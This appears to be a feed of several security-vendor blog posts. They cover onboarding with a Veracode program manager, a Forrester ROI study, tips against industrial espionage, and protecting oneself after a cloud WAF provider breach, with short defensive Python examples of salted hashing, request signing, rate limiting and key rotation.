If you’re a Veracode customer, there’s a good chance that you’ve heard of – or maybe even work with – a Veracode security program manager (SPM). For those of you who might not know, SPMs help you define the goals of your application security program, onboard your team, answer any questions about Veracode products, and work with your teams to ensure that your program stays on track and continues to mature.

If you’re just kicking off your relationship with your program manager, you might be wondering what to expect on your initial calls, and how you can make the most out of the time you spend interacting with each other. Here are a few things you should keep in mind:

How are you developing software?

To realize the value of your investment, we need to understand how your development process works. Right off the bat, your security program manager will want to talk about your existing tech stack (that is, the technology you’re currently using to build your software). There’s a good chance that your organization is in a different place at the time of your kickoff call than it was when your sales cycle closed. Yes, your account executive will tell your program manager all that he or she knows about your status at the time of closing, but in case anything has changed, it’s better to hear everything straight from the horse’s mouth. Helping us understand the size of your software footprint is also key – are you licensed for 10 apps, but have a total of 300, or 3,000? How are they governed from a development and security standpoint? Having everyone on the same page on these basics is a good first step toward maturing your AppSec program.

Who are the key players?

You should also have a clear idea of what your organizational layout is, as well as who the key players are on the development and security sides. Your SPM will know who your key players are, but they likely won’t have met them and interacted with them as much as the account executive has. In addition, if your sales cycle has been particularly long, it’s possible the key players have changed. Be prepared to fill your security program manager in on everyone who has a stake in your AppSec program on the development AND security sides of your organization. Additionally, if there’s any turnover within your company down the line, knowing everyone who’s involved will ensure that SPMs have multiple stakeholders with program context who they can go to in order to keep momentum.

SPMs will also want to know the informal structure of your organization, or the “politics.” It can be helpful to know if your development and security teams are on the same page when it comes to the priority level of AppSec, or if they get along at all! The more insight your SPM has into your organization, the better prepared you can be – as a team – to work together moving forward.

Align your goals and expectations appropriately

Often, the goals that customers set up with Veracode and the goals within their own organizations tend to be two different things. Establish a list of realistic goals, and be prepared to take incremental steps to get there. Rome wasn’t built in a day, and neither is a fully mature application security program.

Once you have your manageable goals, establish who is responsible for each one, and how they’re going to be held accountable for meeting each goal. You’ll need to establish clear channels of communication and accountability internally – for example, when you’re coming up with a plan to remediate flaws, engage development and product management as soon as you have flaw scopes. Make sure that the amount of remediation you’re targeting is realistic for the desired deadline, and let development know about the remediation resources available in the Veracode platform and in the Services organization in case they get stuck. Your SPM can absolutely help you have that conversation!

When it comes to expectations, have an understanding of the driver behind why Veracode was purchased. In some cases, your buyer might not communicate the driving factor to the person running the program – maybe you! Regardless of which end you’re on, make sure that your internal plan is well-communicated with everyone who’s involved across the organization.

At the end of the day, we want you to be successful in your application security journey. By keeping these tips in mind, you’re already one step closer to success. You can find out more by talking to other Veracode customers about how they’ve found success with their application security programs in the Veracode Community.

Veracode Customers Improve Mean Time to Remediation by 90%

Bill Gates is well known for treating time as a scarce resource, and in 1994, John Seabrook published a piece in The New Yorker detailing an email exchange he carried on with the famous technologist. Seabrook notes that Gates’ reverence for time was evident in his correspondence – skipping salutations and pleasantries, leaving spelling mistakes and grammatical errors in-line, and never addressing the journalist by his name. In one of the emails, Gates wrote that, “the digital revolution is all about facilitation – creating tools to make things easy.”

Software is the heart of the global economy, and it has paved the way for increased productivity, simplified workflows, and has helped leaders build businesses beyond their wildest dreams. It has changed the way that security practitioners and developer teams view and manage time, through agile methodology and sprint planning facilitated by tools like JIRA.

Just as minutes, hours, and days can be the difference between meeting sprint deadlines and maintaining speed to market, time is also the difference between preventing a massive data breach and being the victim of one. However, although a cutting-corners approach may work well for email correspondence between colleagues, and perhaps journalists, using this timesaving approach when crafting code has the potential to be downright dangerous. Organizations today need to balance time to market and code quality, which includes code security.

How organizations reduced mean time to remediation and saw a 63% ROI with Veracode

We recently commissioned the Forrester Total Economic Impact™ (TEI) study of the Veracode Application Security Platform to learn how our customers’ security and development teams are strengthening the security posture of their applications and reducing mean time to remediation (MTTR) by implementing DevSecOps practices with our solutions. Based on interviews with Veracode customers in insurance, healthcare, finance, and information technology services, Forrester created a TEI framework, a composite company, and an associated ROI analysis to illustrate the financial impact.

The report found that prior to using Veracode, the composite organization experienced 60 flaws per MB of code, though they were using other application security testing solutions. After adopting the Veracode Platform and integrating tools into their CI/CD pipeline, the composite saw a reduction in security flaws of 50 percent to 90 percent over three years.

Additionally, by implementing DevSecOps practices, building stringent security controls, and integrating vulnerability testing into their CI/CD pipeline, our customers were able to reduce mean time to remediation by 90 percent. Resolutions that previously took 2.5 hours on average were reduced to 15 minutes, helping developers reduce their time spent remediating flaws by 47 percent. This stands to reason, given that our State of Software Security Volume 9 (SOSS Vol. 9) found that the most active DevSecOps teams fix flaws 11.5x faster than the typical organization.

By using Veracode Greenlight and Veracode Software Composition Analysis, developer teams were able to identify issues while they were coding, which reduced the likelihood that flaws would enter later stages of production. What’s more, our customers’ developer teams introduced fewer flaws to their code, and those flaws took less time to resolve because we offered them contextual information related to the data path and call stack information of their code.

It’s not enough to find security flaws quickly if you’re not remediating the right ones quickly

Most companies prioritize high-severity and critical vulnerabilities because they are less complicated to attack, offer greater opportunity for complete application compromise, and are more likely to be remotely exploitable. The trouble is that a low-severity vulnerability that sits in the execution path may put your application at greater risk than a high-severity vulnerability your application never actually calls. The exploitability of a vulnerability is a critical consideration that many organizations overlook.

In our analysis of flaw persistence in SOSS Vol. 9, we found that organizations hit the three-quarters-closed mark about 57 percent sooner for high and very high severity vulnerabilities than for their less severe counterparts. In fact, our scan data indicates that low-severity flaws were addressed at a significantly slower rate than the average speed of closure: it took organizations an average of 604 days to close three quarters of these weaknesses.

With many tools out there, developers will receive an extremely large list of vulnerabilities, including those open source libraries packaged in your application, and they will have to make a judgment call on what to fix first – and how much is worth fixing before pushing to production. The stark reality is that the time it takes developers to fix security flaws has a much larger impact on reducing risk than any other factor.

Veracode offers developers the opportunity to write secure code, limit the vulnerabilities introduced into production, and prioritize vulnerabilities with our vulnerable method approach, expert remediation coaching, and security program managers. To learn more about how the Veracode Platform enables security and development teams to work in stronger alignment, reduce mean time to remediation, and boost an organization’s bottom line, download the Forrester Total Economic Impact™ of Veracode Application Security Platform.

Protecting Your Engineering Business from Industrial Espionage and Cybercriminals

Industrial espionage is a much more common occurrence than many people realize. As a business grows and begins to compete at a higher level, the stakes grow and its corporate secrets become more valuable. It isn’t just other businesses that might want this information; hackers who think they can sell it will also be sniffing about.

Even if you can’t eliminate the risk entirely, there are certain things you can do to reduce the risk of a security breach in your business.

Shred Documents

While hackers do much of their work from their computers, they also often rely on a number of offline methods to enhance their effectiveness. For example, social engineering is regularly used to coerce people into unwittingly undermining otherwise very secure systems. Countering social engineering is difficult, although educating your employees about it will go a long way to mitigating the risk.

If a hacker wants to access your systems but is struggling to breach your cybersecurity, they may well turn to other methods to get through your security, including rummaging through bins for any discarded documents. If that sounds desperate to you, you might not realize just how often it works.

Make sure that any documentation containing information of interest to a would-be hacker or corporate competitor is completely destroyed when it is no longer needed. If you use a shredder for this, choose one that shreds documents securely – a cross-cut model rather than a simple strip-cut one.

Don’t Print Sensitive Information if You Don’t Have to

Of course, better than having to securely destroy documents is not generating them in the first place. If you don’t have to print out sensitive information – don’t! If your sensitive documents are protected by a decent cybersecurity system, they are about as safe as they can be. A physical document is much less secure.

Keep Your Schematics Under Wraps

Anyone who has access to the design schematics of your most important products will be able to reverse engineer them and probe them for weaknesses, even if they don’t have access to a physical device. Modern engineering businesses, like businesses in a number of other industries, make extensive use of printed circuit boards. If a competitor gets their hands on your PCB schematics, they can easily copy your proprietary technology.

Designing your own PCBs with a dedicated design package means you can produce hardware that is unique to your engineering business. This gives you an added layer of security: a potential hacker or criminal won’t know the internal layout and therefore won’t know the potential entry points. However, if they get their hands on your schematics, you instantly lose this benefit.

Keep it Need to Know

Your most sensitive corporate secrets shouldn’t be given to anyone who doesn’t need them. In any business, there will be coworkers who also become friends. Even if people only see each other when they’re at work, they will often develop friendly relationships with one another. It is important to maintain a distinction between business and pleasure – don’t feel bad about withholding sensitive information from someone that you trust if there is no reason for them to have that information.

If you want to keep your engineering business secure, you need to make sure that workers at all levels understand their individual role in ensuring the security of the business as a whole. All it takes is one clueless person to undermine even the most secure cybersecurity system.

The post Protecting Your Engineering Business from Industrial Espionage and Cybercriminals appeared first on CyberDB.

My Cloud WAF Service Provider Suffered a Data Breach…How Can I Protect Myself?

In the age of information, data is everything. Since the implementation of the GDPR in the EU, businesses around the world have grown more “data conscious”; in turn, people, too, know that their data is valuable.

It’s also common knowledge at this point that data breaches are costly. For example, Equifax, the company behind one of the largest-ever data breaches, is expected to pay at least $650 million in settlement fees.

And that’s just the anticipated legal cost of the hacking. The company is also spending hundreds of millions of dollars upgrading its systems to avert future incidents.

Data breaches are no strangers to the cloud WAF arena. Powerful threat detection from your cloud WAF service provider, while important, is not the only thing to rely on for data breach prevention.

API security and secure SSL certificate management are just as important. 

So, what are some ways hackers can cause damage as it relates to cloud WAF customers? And how can you protect yourself if you are using a cloud WAF service?

The topics covered in this blog will answer the following:

  • What can hackers do with stolen emails?
  • What can hackers do with salted passwords?
  • What can hackers do with API keys?
  • What can hackers do with compromised SSL certificates?
  • What can I do to protect myself if I am using a cloud WAF?

► What can hackers do with stolen emails?

When you sign up for a cloud WAF service, your email is automatically stored in the WAF vendor’s database so long as you use their service. 

In the case of a data breach, if emails alone are compromised, then phishing emails and spam are probably your main concern. Phishing emails are so common that we sometimes forget how dangerous they are.

For example, if a hacker has your email address, they have many ways to impersonate a legitimate entity (e.g. by purchasing a similar company domain) and send unsolicited emails to your inbox.


► What can hackers do with salted passwords?

Cloud WAF vendors that store passwords in their database without any hashing or salting are putting their customers at risk if there is a breach, and even more so if hackers already have email addresses. 

In this scenario, hackers can quickly take over your account or sell your login credentials online. But what if the WAF vendor hashed and salted the passwords? Hashing passwords can certainly protect against some intrusions.

In the event of a breach of unsalted password hashes, a hacker can work backwards from the stolen hashes: because unsalted hashing always maps the same password to the same hash, the stolen values can be matched against precomputed tables of common passwords.

This is where salting the hash can help defeat this particular attack, but it won’t guarantee protection against hash collision attacks (a type of attack on a cryptographic hash that tries to find two inputs that produce the same hash value).

In this scenario, systems with weak hashing algorithms can give hackers access to your account even when the actual password is wrong: if two different inputs (the real password and some other string of characters, for example) produce the same hash, the system accepts either one.
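
To make the salting concept above concrete, here is a minimal Python sketch of salted password storage using PBKDF2 from the standard library. This is an illustration of the general technique, not any particular WAF vendor's implementation; the parameters (salt length, iteration count) are illustrative.

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None):
    """Derive a salted hash; a fresh random salt per user defeats precomputed tables."""
    if salt is None:
        salt = os.urandom(16)  # unique random salt for this password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def verify_password(password, salt, expected):
    """Recompute the hash with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(candidate, expected)

# Identical passwords hashed with different salts produce different digests,
# so a leaked hash table cannot be matched against a precomputed password list.
salt_a, hash_a = hash_password("hunter2")
salt_b, hash_b = hash_password("hunter2")
assert hash_a != hash_b
assert verify_password("hunter2", salt_a, hash_a)
assert not verify_password("wrong", salt_a, hash_a)
```

Note that the salt is stored alongside the hash; its job is not secrecy but making every user's hash unique.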

► What can hackers do with API keys?

Cloud WAF vendors that use or provide APIs to allow third-party access must pay extra attention to API security to protect their customers.

APIs are exposed to the internet and transfer data; many cloud WAFs use them to configure load balancers, among other things.

If API requests are not sent over HTTPS or are not authenticated, then there is a risk of hackers taking over developers’ accounts.
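
One common way to authenticate API requests is to sign each one with a shared secret, so the server can check both who sent the request and that it wasn't altered in transit. The sketch below shows the general HMAC-signing pattern in Python; the secret, endpoint path, and payload are hypothetical, and real vendor APIs define their own signing schemes.

```python
import hashlib
import hmac
import time

API_SECRET = b"example-shared-secret"  # hypothetical secret issued by the API provider

def sign_request(method, path, body, secret, timestamp=None):
    """Build an HMAC-SHA256 signature over the method, path, timestamp, and body."""
    timestamp = timestamp or str(int(time.time()))
    message = f"{method}\n{path}\n{timestamp}\n".encode() + body
    signature = hmac.new(secret, message, hashlib.sha256).hexdigest()
    return timestamp, signature

def verify_request(method, path, body, secret, timestamp, signature):
    """Recompute the signature server-side and compare in constant time."""
    _, expected = sign_request(method, path, body, secret, timestamp)
    return hmac.compare_digest(expected, signature)

ts, sig = sign_request("POST", "/v1/whitelist", b'{"ip": "203.0.113.7"}', API_SECRET)
assert verify_request("POST", "/v1/whitelist", b'{"ip": "203.0.113.7"}', API_SECRET, ts, sig)
# A tampered body fails verification:
assert not verify_request("POST", "/v1/whitelist", b'{"ip": "evil"}', API_SECRET, ts, sig)
```

Including a timestamp in the signed message also lets the server reject old requests, which limits replay attacks.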

If a cloud WAF vendor exposes a public API that doesn’t require a registered, authorized account for access, hackers can exploit this to send repeated API requests. Had registration been required, each API key could be tracked and flagged when it makes too many suspicious requests.
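
The per-key tracking just described is, in essence, a sliding-window rate limiter. Here is a minimal sketch of the idea, assuming an in-memory tracker with illustrative thresholds; a production service would likely use a shared store such as Redis instead.

```python
import time
from collections import defaultdict, deque

class KeyRateTracker:
    """Track request timestamps per API key and refuse keys that exceed a threshold."""

    def __init__(self, max_requests=100, window_seconds=60):
        self.max_requests = max_requests
        self.window = window_seconds
        self.history = defaultdict(deque)  # api_key -> timestamps of recent requests

    def allow(self, api_key, now=None):
        now = time.monotonic() if now is None else now
        q = self.history[api_key]
        # Drop timestamps that have fallen out of the sliding window.
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.max_requests:
            return False  # key is making too many requests; throttle or review it
        q.append(now)
        return True

tracker = KeyRateTracker(max_requests=3, window_seconds=60)
assert all(tracker.allow("key-abc", now=t) for t in (0, 1, 2))
assert not tracker.allow("key-abc", now=3)  # fourth request inside the window is refused
assert tracker.allow("key-abc", now=120)    # old requests expire; the key recovers
```

Because every request is tied to a key, the same history can also feed abuse detection, not just throttling.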

Beyond securing API keys, developers must also secure their cloud credentials. If a hacker gains access to these, they could take down servers, corrupt DNS information, and more.

API security is not only a concern for developers but also for end users using APIs for their cloud WAF service as you’ll see in the next section. 

► What can hackers do with compromised SSL certificates?

Next, what happens if the SSL certificates that WAF customers provided end up in the hands of hackers?

Let’s assume the hacker has both the API keys and SSL certificates. In this scenario, hackers can affect the security of the incoming and outgoing traffic for customer websites.

With the API keys, hackers can whitelist their own websites in the cloud WAF’s settings, allowing those websites to bypass detection. This lets them attack sites freely.

Additionally, hackers could modify a customer website’s settings to divert traffic to their own sites for malicious purposes. Because the hackers also hold the SSL certificates, they can decrypt this traffic as well, putting you at risk of exploits and other vulnerabilities.


► What can I do to protect myself if I am using a cloud WAF?

First, understand that your data is never 100% safe. If a company claims that your data is 100% safe, then you should be wary. No company can guarantee that your data will always be safe with them. 

When there is a data breach, however, cloud WAF customers are strongly encouraged to change their passwords, enable 2FA, upload new SSL certificates, and reset their API keys. 

Only two of these are realistic routine measures (changing your passwords frequently and using 2FA); it’s unlikely that you, as a customer, will frequently upload new SSL certificates or change your API keys.
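
Even so, key rotation can be partly automated. The sketch below shows the general idea with Python's `secrets` module and a hypothetical age-based rotation policy; the 90-day threshold is illustrative, and registering the new key with your vendor would go through whatever interface they provide.

```python
import secrets
from datetime import datetime, timedelta, timezone

def issue_api_key(nbytes=32):
    """Generate a new cryptographically random, URL-safe API key."""
    return secrets.token_urlsafe(nbytes)

def needs_rotation(issued_at, max_age_days=90, now=None):
    """Flag keys older than the rotation policy allows."""
    now = now or datetime.now(timezone.utc)
    return now - issued_at > timedelta(days=max_age_days)

old_key_issued = datetime.now(timezone.utc) - timedelta(days=120)
if needs_rotation(old_key_issued):
    new_key = issue_api_key()  # register the new key with the vendor, then revoke the old one
assert needs_rotation(old_key_issued)
assert not needs_rotation(datetime.now(timezone.utc))
```

The point is less the code than the habit: stale credentials are the ones most likely to be sitting in a leaked database.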

Thus, we recommend that you ask your WAF vendors about the security of not just the WAF technology itself but also how they deal with API security and how they store SSL certificates for their customers.



The post My Cloud WAF Service Provider Suffered a Data Breach…How Can I Protect Myself? appeared first on Cloudbric.